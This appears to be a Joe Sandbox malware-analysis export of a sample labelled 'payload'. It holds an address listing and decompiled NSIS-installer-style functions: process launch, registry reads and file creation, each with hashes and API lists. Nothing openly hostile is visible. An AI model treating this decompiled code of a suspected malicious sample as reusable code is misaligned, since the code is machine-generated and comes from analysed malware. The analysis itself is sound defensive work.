0x00406be6
0x00406be6
0x00406a11
0x00406a18
0x00406a20
0x00406a23
0x00406a26
0x00406a26
0x00406a2c
0x00406a2c
0x004061c8
0x004061c8
0x004061c8
0x004061d1
0x00000000
0x00000000
0x004061d7
0x00000000
0x004061e2
0x00000000
0x00000000
0x004061eb
0x004061ee
0x004061f1
0x004061f5
0x00000000
0x00000000
0x004061fb
0x004061fe
0x00406200
0x00406201
0x00406204
0x00406206
0x00406207
0x00406209
0x0040620c
0x00406211
0x00406216
0x0040621f
0x00406232
0x00406235
0x00406241
0x00406269
0x0040626b
0x00406279
0x00406279
0x0040627d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040626d
0x0040626d
0x00406270
0x00406271
0x00406271
0x00000000
0x0040626d
0x00406247
0x0040624c
0x0040624c
0x00406255
0x0040625d
0x00406260
0x00000000
0x00406266
0x00406266
0x00000000
0x00406266
0x00000000
0x00406283
0x00406283
0x00406287
0x00406b33
0x00000000
0x00406b33
0x00406290
0x004062a0
0x004062a3
0x004062a6
0x004062a6
0x004062a6
0x004062a9
0x004062ad
0x00000000
0x00000000
0x004062af
0x004062b5
0x004062df
0x004062e5
0x004062ec
0x00000000
0x004062ec
0x004062bb
0x004062be
0x004062c3
0x004062c3
0x004062ce
0x004062d6
0x004062d9
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040631e
0x00406324
0x00406327
0x00406334
0x0040633c
0x004069b0
0x00000000
0x00000000
0x004062f3
0x004062f3
0x004062f7
0x00406b42
0x00000000
0x00406b42
0x00406303
0x0040630e
0x0040630e
0x0040630e
0x00406311
0x00406314
0x00406317
0x0040631c
0x00000000
0x00000000
0x00000000
0x00000000
0x004069b3
0x004069b3
0x004069b9
0x004069bf
0x004069c5
0x004069df
0x004069e2
0x004069e8
0x004069f3
0x004069f5
0x004069c7
0x004069c7
0x004069d6
0x004069da
0x004069da
0x004069ff
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406344
0x00406346
0x00406349
0x004063ba
0x004063bd
0x004063c0
0x004063c7
0x004063d1
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x004069b0
0x0040634b
0x0040634f
0x00406352
0x00406354
0x00406357
0x0040635a
0x0040635c
0x0040635f
0x00406361
0x00406366
0x00406369
0x0040636c
0x00406370
0x00406377
0x0040637a
0x00406381
0x00406385
0x0040638d
0x0040638d
0x0040638d
0x00406387
0x00406387
0x00406387
0x0040637c
0x0040637c
0x0040637c
0x00406391
0x00406394
0x004063b2
0x004063b4
0x00000000
0x00406396
0x00406396
0x00406399
0x0040639c
0x0040639f
0x004063a1
0x004063a1
0x004063a1
0x004063a4
0x004063a7
0x004063a9
0x004063aa
0x004063ad
0x00000000
0x004063ad
0x00000000
0x004065e3
0x004065e7
0x00406605
0x00406608
0x0040660f
0x00406612
0x00406615
0x00406618
0x0040661b
0x0040661e
0x00406620
0x00406627
0x00406628
0x0040662a
0x0040662d
0x00406630
0x00406633
0x00406633
0x00406638
0x00000000
0x00406638
0x004065e9
0x004065ec
0x004065ef
0x004065f9
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00000000
0x00000000
0x00000000
0x00406690
0x00406694
0x00000000
0x00000000
0x0040669a
0x0040669e
0x00000000
0x00000000
0x004066a4
0x004066a6
0x004066aa
0x004066aa
0x004066ad
0x004066b1
0x00000000
0x00000000
0x00406701
0x00406705
0x0040670c
0x0040670f
0x00406712
0x0040671c
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x004069b0
0x00406707
0x00000000
0x00000000
0x00406728
0x0040672c
0x00406733
0x00406736
0x00406739
0x0040672e
0x0040672e
0x0040672e
0x0040673c
0x0040673f
0x00406742
0x00406742
0x00406745
0x00406748
0x0040674b
0x0040674b
0x0040674e
0x00406755
0x0040675a
0x00000000
0x00000000
0x004067e8
0x004067e8
0x004067ec
0x00406b8a
0x00000000
0x00406b8a
0x004067f2
0x004067f5
0x004067f8
0x004067fc
0x004067ff
0x00406805
0x00406807
0x00406807
0x00406807
0x0040680a
0x0040680d
0x00000000
0x00000000
0x004063dd
0x004063dd
0x004063e1
0x00406b4e
0x00000000
0x00406b4e
0x004063e7
0x004063ea
0x004063ed
0x004063f1
0x004063f4
0x004063fa
0x004063fc
0x004063fc
0x004063fc
0x004063ff
0x00406402
0x00406402
0x00406405
0x00406408
0x00000000
0x00000000
0x0040640e
0x00406414
0x00000000
0x00000000
0x0040641a
0x0040641a
0x0040641e
0x00406421
0x00406424
0x00406427
0x0040642a
0x0040642b
0x0040642e
0x00406430
0x00406436
0x00406439
0x0040643c
0x0040643f
0x00406442
0x00406445
0x00406448
0x00406464
0x00406467
0x0040646a
0x0040646d
0x00406474
0x00406478
0x0040647a
0x0040647e
0x0040644a
0x0040644a
0x0040644e
0x00406456
0x0040645b
0x0040645d
0x0040645f
0x0040645f
0x00406481
0x00406488
0x0040648b
0x00000000
0x00406491
0x00000000
0x00406491
0x00000000
0x00406496
0x00406496
0x0040649a
0x00406b5a
0x00000000
0x00406b5a
0x004064a0
0x004064a3
0x004064a6
0x004064aa
0x004064ad
0x004064b3
0x004064b5
0x004064b5
0x004064b5
0x004064b8
0x004064bb
0x004064bb
0x004064bb
0x004064c1
0x00000000
0x00000000
0x004064c3
0x004064c6
0x004064c9
0x004064cc
0x004064cf
0x004064d2
0x004064d5
0x004064d8
0x004064db
0x004064de
0x004064e1
0x004064f9
0x004064fc
0x004064ff
0x00406502
0x00406502
0x00406505
0x00406509
0x0040650b
0x004064e3
0x004064e3
0x004064eb
0x004064f0
0x004064f2
0x004064f4
0x004064f4
0x0040650e
0x00406515
0x00406518
0x00000000
0x0040651a
0x00000000
0x0040651a
0x00406518
0x0040651f
0x0040651f
0x0040651f
0x0040651f
0x00000000
0x00000000
0x0040655a
0x0040655a
0x0040655e
0x00406b66
0x00000000
0x00406b66
0x00406564
0x00406567
0x0040656a
0x0040656e
0x00406571
0x00406577
0x00406579
0x00406579
0x00406579
0x0040657c
0x0040657f
0x0040657f
0x00406585
0x00406523
0x00406523
0x00406526
0x00000000
0x00406526
0x00406587
0x00406587
0x0040658a
0x0040658d
0x00406590
0x00406593
0x00406596
0x00406599
0x0040659c
0x0040659f
0x004065a2
0x004065a5
0x004065bd
0x004065c0
0x004065c3
0x004065c6
0x004065c6
0x004065c9
0x004065cd
0x004065cf
0x004065a7
0x004065a7
0x004065af
0x004065b4
0x004065b6
0x004065b8
0x004065b8
0x004065d2
0x004065d9
0x004065dc
0x00000000
0x004065de
0x00000000
0x004065de
0x00000000
0x0040686b
0x0040686b
0x0040686f
0x00406b96
0x00000000
0x00406b96
0x00406875
0x00406878
0x0040687b
0x0040687f
0x00406882
0x00406888
0x0040688a
0x0040688a
0x0040688a
0x0040688d
0x00000000
0x00000000
0x0040663b
0x0040663b
0x0040663e
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x00000000
0x0040697a
0x0040697e
0x004069a0
0x004069a3
0x004069ad
0x004069b0
0x004069b0
0x00000000
0x004069b0
0x004069b0
0x00406980
0x00406983
0x00406987
0x0040698a
0x0040698a
0x0040698d
0x00000000
0x00000000
0x00406a37
0x00406a3b
0x00406a59
0x00406a59
0x00406a59
0x00406a60
0x00406a67
0x00406a6e
0x00406a6e
0x00000000
0x00406a6e
0x00406a3d
0x00406a40
0x00406a43
0x00406a46
0x00406a4d
0x00406991
0x00406991
0x00406994
0x00000000
0x00000000
0x00406b28
0x00406b2b
0x00406a2c
0x00000000
0x00000000
0x00406762
0x00406764
0x0040676b
0x0040676c
0x0040676e
0x00406771
0x00000000
0x00000000
0x00406779
0x0040677c
0x0040677f
0x00406781
0x00406783
0x00406783
0x00406784
0x00406787
0x0040678e
0x00406791
0x0040679f
0x00000000
0x00000000
0x00406a75
0x00406a75
0x00406a78
0x00406a7f
0x00000000
0x00000000
0x00406a84
0x00406a84
0x00406a88
0x00406bc0
0x00000000
0x00406bc0
0x00406a8e
0x00406a91
0x00406a94
0x00406a98
0x00406a9b
0x00406aa1
0x00406aa3
0x00406aa3
0x00406aa3
0x00406aa6
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aa9
0x00406aac
0x00406aac
0x00406ab0
0x00406b10
0x00406b13
0x00406b18
0x00406b19
0x00406b1b
0x00406b1d
0x00406b20
0x00406a2c
0x00406a2c
0x00000000
0x00406a32
0x00406a2c
0x00406ab2
0x00406ab8
0x00406abb
0x00406abe
0x00406ac1
0x00406ac4
0x00406ac7
0x00406aca
0x00406acd
0x00406ad0
0x00406ad3
0x00406aec
0x00406aef
0x00406af2
0x00406af5
0x00406af9
0x00406afb
0x00406afb
0x00406afc
0x00406aff
0x00406ad5
0x00406ad5
0x00406add
0x00406ae2
0x00406ae4
0x00406ae7
0x00406ae7
0x00406b02
0x00406b09
0x00000000
0x00406b0b
0x00000000
0x00406b0b
0x00000000
0x004067a7
0x004067aa
0x004067e0
0x00406910
0x00406910
0x00406910
0x00406910
0x00406913
0x00406913
0x00406916
0x00406918
0x00406ba2
0x00000000
0x00406ba2
0x0040691e
0x00406921
0x00000000
0x00000000
0x00406927
0x0040692b
0x0040692e
0x0040692e
0x0040692e
0x00000000
0x0040692e
0x004067ac
0x004067ae
0x004067b0
0x004067b2
0x004067b5
0x004067b6
0x004067b8
0x004067ba
0x004067bd
0x004067c0
0x004067d6
0x004067db
0x00406813
0x00406813
0x00406817
0x00406843
0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00406529
0x00406529
0x0040652d
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x00000000
0x00000000
0x004066b4
0x004066b4
0x004066b8
0x00406b7e
0x00000000
0x00406b7e
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ea
0x004066ed
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x004066f2
0x004066f2
0x00000000
0x004066f2
0x00406973
0x00406ba8
0x00000000
0x00000000
0x004061d7
0x00406bdf
0x00406bdf
0x00000000
0x00406bdf
0x00406a2c
0x004069b3
0x004069b0

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
Instruction ID: 94740bf10ed9628fc2a816943eb7322e71ed29eec5e37d1a6fe0f7c23d4f3e83
Opcode Fuzzy Hash: 1b21a4910564614c6641403ac362d6aa440f40f6368f9ee5d1983abbc3d5a3b8
Instruction Fuzzy Hash: 1D714571E04228CBDF28CF98C854BADBBB1FB44305F11806ED856BB281C7786A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00401E44 Relevance: 4.5, APIs: 3, Instructions: 48
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401E44() {
				void* _t15;
				void* _t24;
				void* _t26;
				void* _t31;

				_t28 = E00402A3A(_t24);
				E00404F12(0xffffffeb, _t13);
				_t15 = E0040548A(_t28); // executed
				 *(_t31 + 8) = _t15;
				if(_t15 == _t24) {
					 *((intOrPtr*)(_t31 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t31 - 0x20)) != _t24) {
						while(WaitForSingleObject( *(_t31 + 8), 0x64) == 0x102) {
							E004060CE(0xf);
						}
						GetExitCodeProcess( *(_t31 + 8), _t31 - 0xc);
						if( *((intOrPtr*)(_t31 - 0x24)) < _t24) {
							if( *(_t31 - 0xc) != _t24) {
								 *((intOrPtr*)(_t31 - 4)) = 1;
							}
						} else {
							E00405C57(_t26,  *(_t31 - 0xc));
						}
					}
					_push( *(_t31 + 8));
					CloseHandle();
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t31 - 4));
				return 0;
			}

0x00401e4a
0x00401e4f
0x00401e55
0x00401e5c
0x00401e5f
0x004026a6
0x00401e65
0x00401e68
0x00401e79
0x00401e74
0x00401e74
0x00401e8e
0x00401e97
0x00401ea7
0x00401ea9
0x00401ea9
0x00401e99
0x00401e9d
0x00401e9d
0x00401e97
0x00401eb0
0x00401eb3
0x00401eb3
0x004028d2
0x004028de

APIs

Part of subcall function 00404F12: lstrlenA.KERNEL32(0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,0041F4E8,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
Part of subcall function 00404F12: lstrcatA.KERNEL32(0041F4E8,00402FCF,00402FCF,0041F4E8,00000000,0040E8C0,00000000), ref: 00404F6E
Part of subcall function 00404F12: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 00404F80
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FA6
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FC0
Part of subcall function 00404F12: SendMessageA.USER32 ref: 00404FCE

Part of subcall function 0040548A: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004054B3
Part of subcall function 0040548A: CloseHandle.KERNEL32(?), ref: 004054C0

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E7E
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E8E
CloseHandle.KERNEL32(?), ref: 00401EB3

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
String ID:
API String ID: 3521207402-0
Opcode ID: 49e7ed0533c3ddddde98bc85c632754f8ae4837d9813caa7016193d92f337056
Instruction ID: 49f7d359c4d218189077cc8fb8a526ed56d4096950e75cb47e310611910bd6fc
Opcode Fuzzy Hash: 49e7ed0533c3ddddde98bc85c632754f8ae4837d9813caa7016193d92f337056
Instruction Fuzzy Hash: C4016D31904104EBDF11AFA1C984A9E77B2EF00354F10817BFA01B52E1C7785A85AB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE0 Relevance: 4.5, APIs: 3, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405BE0(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				long _t23;
				long _t24;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20); // executed
				if(_t20 == 0) {
					_a8 = 0x400;
					_t23 = RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8); // executed
					if(_t23 != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					_t24 = RegCloseKey(_a20); // executed
					return _t24;
				}
				return _t20;
			}

0x00405bf0
0x00405bf2
0x00405bff
0x00405c09
0x00405c11
0x00405c16
0x00405c2a
0x00405c32
0x00405c40
0x00405c40
0x00405c45
0x00405c4b
0x00000000
0x00405c4b
0x00405c54

APIs

RegOpenKeyExA.KERNEL32(80000002,00405E25,00000000,00000002,?), ref: 00405C09
RegQueryValueExA.KERNEL32 ref: 00405C2A
RegCloseKey.KERNEL32(?), ref: 00405C4B

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
Instruction ID: c16e3abce3e86e16c1a4588743a1117629dce573bc303fe916445e4d8ee7e6e7
Opcode Fuzzy Hash: 0c8888e50600bbfc423f29d3e13c34afc4b2d72f1a725d9a4029968a390a76be
Instruction Fuzzy Hash: B3015A7254420AEFEB128F64EC49EEB3FACEF14354F044036F944A6220D235D964DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402482 Relevance: 4.5, APIs: 3, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00402482(int* __ebx, char* __esi) {
				void* _t7;
				int _t8;
				long _t11;
				int* _t14;
				void* _t18;
				char* _t20;
				void* _t22;
				void* _t25;

				_t20 = __esi;
				_t14 = __ebx;
				_t7 = E00402B44(_t25, 0x20019); // executed
				_t18 = _t7;
				_t8 = E00402A1D(3);
				 *__esi = __ebx;
				if(_t18 == __ebx) {
					L7:
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					 *(_t22 + 8) = 0x3ff;
					if( *((intOrPtr*)(_t22 - 0x18)) == __ebx) {
						_t11 = RegEnumValueA(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx); // executed
						__eflags = _t11;
						if(_t11 != 0) {
							goto L7;
						} else {
							goto L4;
						}
					} else {
						RegEnumKeyA(_t18, _t8, __esi, 0x3ff); // executed
						L4:
						_t20[0x3ff] = _t14;
						_push(_t18); // executed
						RegCloseKey(); // executed
					}
				}
				 *0x423788 =  *0x423788 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00402482
0x00402482
0x00402487
0x0040248e
0x00402490
0x00402497
0x00402499
0x004026a6
0x004026a6
0x0040249f
0x004024a7
0x004024aa
0x004024c3
0x004024c9
0x004024cb
0x00000000
0x00000000
0x00000000
0x00000000
0x004024ac
0x004024b0
0x004024d1
0x004024d1
0x004024d7
0x004024d8
0x004024d8
0x004024aa
0x004028d2
0x004028de

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B6C

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024B0
RegEnumValueA.KERNEL32 ref: 004024C3
RegCloseKey.KERNEL32(?), ref: 004024D8

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 081feed79697e1e5fb5dc3aba588dec9fcfdfd45edaf8ed89b32f200e3f9be0f
Instruction ID: 070e1f6e5a6b9be8feed57f98e06303e5303b2278279fcdfa1a0cb603d5e6ac6
Opcode Fuzzy Hash: 081feed79697e1e5fb5dc3aba588dec9fcfdfd45edaf8ed89b32f200e3f9be0f
Instruction Fuzzy Hash: D3F0A272904100BFEB119F659D88E7B7A6DEB40344B10443EF505A61C0D6B849459A7A

Uniqueness

Uniqueness Score: -1.00%

Function 100027E8 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(00000000), ref: 100028A7
GetLastError.KERNEL32 ref: 100029AE

Memory Dump Source

Source File: 00000001.00000002.1417066379.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.1417055818.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417073030.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1417078966.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_payload.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction ID: 700bf99a33fcd989ee77f819fa46e2371db99389a88ce2eb288524e3b596c0af
Opcode Fuzzy Hash: 7af5c486cb8ea8547353861cfd678fbd8d20862330e18d67419e74999799b2ae
Instruction Fuzzy Hash: 9751A2BA908214DFFB10DF64DCC674937A4EB443D4F21842AEA08E726DCF34A9808B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402410 Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402410(int* __ebx, char* __esi) {
				char* _t18;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t33 = E00402B44(_t40, 0x20019);
				_t18 = E00402A3A(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x34) = 0x400;
					if(RegQueryValueExA(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x34) != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x18) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
							E00405C57(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x18);
								_t35[0x3ff] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x423788 =  *0x423788 +  *(_t37 - 4);
				return 0;
			}

0x00402410
0x00402410
0x0040241c
0x0040241e
0x00402425
0x00402427
0x004026a6
0x0040242d
0x00402430
0x0040244b
0x0040247b
0x0040247b
0x0040247d
0x0040244d
0x00402451
0x0040246a
0x00402471
0x00402474
0x00402453
0x00402456
0x00402461
0x004024d1
0x00000000
0x00000000
0x00000000
0x00402456
0x00402451
0x004024d7
0x004024d8
0x004024d8
0x004028d2
0x004028de

APIs

Part of subcall function 00402B44: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00000022,00000000), ref: 00402B6C

RegQueryValueExA.ADVAPI32 ref: 00402440
RegCloseKey.KERNEL32(?), ref: 004024D8

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: f0b1188a79bc87c14dcfdcab40d7666e728bb1c221bf0190823456a582dcb0bb
Instruction ID: 5ce6926f2417f3d17e5e854e85a0bcf64bccf2bfa1e8e40673093317e398bbc6
Opcode Fuzzy Hash: f0b1188a79bc87c14dcfdcab40d7666e728bb1c221bf0190823456a582dcb0bb
